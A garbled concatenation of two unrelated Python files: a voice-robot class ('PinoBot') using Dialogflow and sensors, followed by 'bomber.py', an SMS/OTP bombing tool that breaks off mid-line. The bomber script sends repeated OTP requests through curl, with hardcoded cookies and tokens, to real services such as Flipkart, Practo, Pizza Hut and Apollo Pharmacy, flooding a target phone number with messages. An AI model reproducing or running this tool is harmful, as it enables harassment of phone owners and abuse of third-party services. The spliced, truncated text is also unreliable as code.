SENSOR_OFF = 3
LISTEN_SUCCESS = 11
LISTEN_FAIL = 12
LISTEN_CLOUD_ERROR = 13
UART_ON = 20
DO_SOMETHING = 30
#GO_SLEEP = 4
#WAKEP_UP = 5
class PinoBot:
"""
Description:
pinobot main module
-
Summary of Class
1. setup(self):
set logging and boot pinobot
2. update(self):
read hardware and update PinoBot's State
3. listen(self):
start audio recording and streaming and return response
if google cloud error occurs, display to OLED
4. say(self,response):
pinobot say tts response
5. act(self, response):
pinobot do action by response.action_cmd
6. call_uart_event(self):
if pinobot's uart got some message,
use this to call dialogflow event
5. call_intent(self,text = "" ,event_name="", event_parameter=None):
call dialogflow manually by dict or text, and get responses
"""
def __init__(self,base_path ="/home/pi/Desktop/PinoBot/"):
# 0. Argument
# 1. Static Variables
# 2. variables
self.cur_volume = 0 # current speaker volume rate [ 0 ~ 10 ]
self.detect = {
"pre_state": 0, # last sensor state, 1: in , 0: out
"distance": 30, # cm # sonic sensor threshold to between 1 to 0
"first_time": time.time(),
} # sec # first time sonic sensor detect object
self.base_path = base_path
self.state = PinoState.IDLE
# 3. Objects
self.hardware = None
self.cloud = None
self.config = None
self.log = None
self.response = None
self.uart_cmd = None
# threads
self.say_thread = None
self.act_thread = None
# 4. Run setup
self.setup()
def setup(self):
"""
Description
-----------
set logging and boot pinobot
"""
# 1. init log
path = self.base_path + "/main.log"
self.log = logging.getLogger("Main")
self.log.setLevel(logging.DEBUG)
formatter = logging.Formatter(
"[%(levelname)s] (%(asctime)s : %(filename)s:%(lineno)d) > %(message)s"
)
log_file = RotatingFileHandler(
filename=path, maxBytes=5 * 1024 * 1024, mode="w", encoding="utf-8"
)
log_file.setFormatter(formatter)
self.log.addHandler(log_file)
log_console = logging.StreamHandler()
log_console.setFormatter(formatter)
self.log.addHandler(log_console)
self.log.info("[PinoBot] Start Boot")
boot = PinoBootLoader(self.base_path,self.log)
# 2. run boot sequence
self.hardware, self.cloud, self.config = boot.boot()
del boot
self.log.info("[PinoBot] Boot Done..")
def update(self):
"""
Description
-----------
read hardware and update PinoBot's State
Notes
-----
State : PinoState
priority [1] : Serial command
priority [2] : ultrasonic sensor state
If the ultrasonic sensor and uart command come in at the same time,
the uart command is given priority.
"""
# 2. read hardware signals
cur_sensor_state = 0
distance,uart_cmd = self.hardware.read()
if self.detect["distance"] > distance > 4:
cur_sensor_state = 1
# 3. uart command on
if uart_cmd is not None:
self.uart_cmd = uart_cmd
self.state = PinoState.UART_ON
print("uart : ",self.uart_cmd)
return self.state
# 4. set state by sensor
if self.detect["pre_state"] == 0 and cur_sensor_state == 1:
# 4.1 object [ 0 -> 1 ] , new object, add talk task
self.detect["first_time"] = time.time()
self.state = PinoState.SENSOR_ON
elif self.detect["pre_state"] == 1 and cur_sensor_state == 1:
# 4.2 object [ 1 -> 1 ] , object still in
self.state = PinoState.STILL_ON
elif self.detect["pre_state"] == 1 and cur_sensor_state == 0:
# 4.3 object [ 1 -> 0 ] , object gone
self.state = PinoState.SENSOR_OFF
self.detect["pre_state"] = cur_sensor_state # update sensor state
return self.state
def listen(self):
"""
Description
-----------
start audio recording and streaming and return response
if google cloud error occurs, display to OLED
Return
------
response : { Parsed DialogFlow response , PinoResponse object}
"""
self.log.info("listen")
self.hardware.write(text="듣는중")
# 2.1. streaming voice
if self.cloud.start_stream() == -1:
self.hardware.write(text="녹음 실패\n ㅠㅠ")
return None
self.hardware.write(text="듣는중..")
try:
response = self.cloud.get_stream_response()
if response.stt_result == "[Fail]":
self.state = PinoState.LISTEN_FAIL
return None
# 2.E0. Gcloud Error
if self.cloud.gcloud_state < 0:
self.state = PinoState.LISTEN_CLOUD_ERROR
if self.cloud.gcloud_state == -1: # Internet Error
self.hardware.write(text="인터넷 문제\n 가 있어요 ㅠㅠ ")
elif self.cloud.gcloud_state == -2: # google server error
self.hardware.write(text="인터넷 문제\n 가 있어요 ㅠㅠ ")
elif self.cloud.gcloud_state == -3:
self.hardware.write(text="오늘의 할당량을 \n 다 사용했네요 ㅠㅠ")
elif self.cloud.gcloud_state < -3:
self.hardware.write(text="무언가 문제가 있어요 \n ㅠㅠ")
self.log.warning("[PinoBot] cloud Error type : %d" % self.cloud.gcloud_state)
except Exception as E:
self.log.error("[PinoBot] listen Error : %s" % repr(E))
return None
else:
return response
def start_say(self, response):
"""
Description
-----------
pinobot say tts response
Parameters
----------
response : { Parsed DialogFlow response , PinoResponse object}
PinoResponse.tts_result is audio binary file .wav format
[TODO] add local wave file play feature
"""
if response is None:
self.log.warning("say.. nothing")
return 0
try:
self.say_thread = threading.Thread(
target=self.cloud.play_audio_response, args=(response,)
)
self.say_thread.start()
except Exception as E:
self.log.error("[PinoBot] say Error : %s" % repr(E))
return -1
def start_act(self, response):
"""
Description
-----------
pinobot do action by response.action_cmd
Notes
-----
action could take few seconds, therefor add threading
Parameters
----------
response : { Parsed DialogFlow response , PinoResponse object}
PinoResponse.action_cmd is list of comaands
Return
------
result : 0 Success
1 Fail
"""
if response is None:
self.log.warning('act.. nothing')
return 0
try:
self.act_thread = threading.Thread(
target=self.hardware.run_pinobot_cmd, args=(response,)
)
self.act_thread.start()
except Exception as E:
self.log.error("[PinoBot] act Error : %s" % repr(E))
return -1
else :
return 0
def wait_say_and_act(self,timeout = 30):
"""
Description
-----------
wait until say and act finish
Parameters
----------
timeout : seconds {int or float}
Return
------
result : 0 Success
1 Fail
"""
self.state = PinoState.DO_SOMETHING
if self.act_thread and self.say_thread :
for i in range (int(timeout*1000)):
if self.act_thread.is_alive() and self.say_thread.is_alive():
time.sleep(0.01)
else :
return 0
# [TODO] add flag to all thread and make ways to force stop.
return -1
def call_uart_event(self):
"""
Description
-----------
if pinobot's uart got some message,
use this to call dialogflow event
Notes
-----
uart_cmd : { dict }
{ event_name : $name ,
para1Name : $para1Value,
...
paraNName : $paraNValue,
}
Return
------
response : { Parsed DialogFlow response , PinoResponse object}
z
"""
try:
if self.uart_cmd is not None:
self.hardware.write(text="메세지 확인중..")
response = self.cloud.send_event(self.uart_cmd ['event_name'], self.uart_cmd )
self.uart_cmd = None # reset
self.state = PinoState.IDLE
self.hardware.write(serial_msg = "ready")
return response
else:
self.hardware.write(serial_msg = "ready")
return self.cloud.parsing_response(None,None,None)
except Exception as E:
self.log.error("[PinoBot] call_uart_event Error : %s" % repr(E))
return None
def call_intent(self,text = "" ,event_name="", event_parameter=None):
"""
Description
-----------
call dialogflow manually by dict or text, and get responses
Parameters
----------
text : natural word message to call dialogflow { str, optional }
event_name : dialogflow intent event name { str, optional }
event_parameter : dialogflow intent parameter { dict, optional }
event_parameter without event_name is useless
Return
------
response : { Parsed DialogFlow response , PinoResponse object}
Example
-------
r = bot.call_intent(text = '안녕하세요')
print(r.intent_response)
>> 반갑습니다 저는 피노봇입니다
r = bot.call_intent("weather",{'humidity:'50','temp':'20'}
print(r.intent_response)
>> 지금 방의 상태를 알려드립니다, 습도는 50프로 온도는 20도입니다.
"""
try :
if event_name is not "":
self.cloud.send_event(event_name, event_parameter)
return self.cloud.parsing_response()
except Exception as E:
self.log.error("[PinoBot] call_intent Error : %s" % repr(E))
return None
def return_idle(self):
"""
Description
-----------
display idle message and
return state to idle
"""
self.hardware.write(text="대기중..")
self.state = PinoState.IDLE
|
bomber.py
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To Sparkz-technology
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
████████ ██████ ██
▒▒▒██▒▒▒ ██▒▒▒██ ██
██ ██ ██ ████ ██ ██ ██
██ ██████▒ ██▒▒██ ███ ███ █████
██ ██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██
██ ██ ██ ██ ██ ██ ▒ ██ ██ ██
██ ██████▒ ▒████▒ ██ ██ █████▒
▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, max):
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo Sparkz >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
requests.get('https://www.google.com', verify=True)
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
def getapi(pn, lim, cc):
global country_codes
cc = str(cc).strip()
cnn = country_codes[cc]
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
os.system('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno=' + pn + '&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')
return True
elif lim == 4:
os.system(
'curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"' + pn + '","country_code":"' + cc + '"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')
return True
elif lim == 5:
os.system('curl -s -X POST -H "Accept:*/*" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.5" -H "Connection:keep-alive" -H "Content-Length:34" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:www.oriyamatrimony.com" -H "Referer:https://www.oriyamatrimony.com/" -H "User-Agent:Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0" -H "X-Requested-With:XMLHttpRequest" -d "countrycode=' +
cc + '&mobileno=' + pn + '" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')
return True
elif lim == 6:
os.system(
'curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+' + cc + pn + '"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')
return True
elif lim == 7:
os.system('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+' + cc + pn + '&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')
return True
elif lim == 8:
os.system('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile=' + pn + '&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')
return True
elif lim == 9:
rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
os.system(
'curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"' + pn + '","UserName":"' + pn + '","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')
return True
elif lim == 11:
os.system('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl=' + pn + '" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')
return True
elif lim == 12:
os.popen('rm temp.xxx1 > /dev/null 2>&1')
os.system(
'curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile=' + pn + '\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')
while not os.path.exists('temp.xxx1'):
time.sleep(0.1)
rd = str(open('temp.xxx1', 'rb').read()) + " "
return rd.find("sent") != -1
elif lim == 13:
rd = ' '
try:
rd = os.popen(
' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; 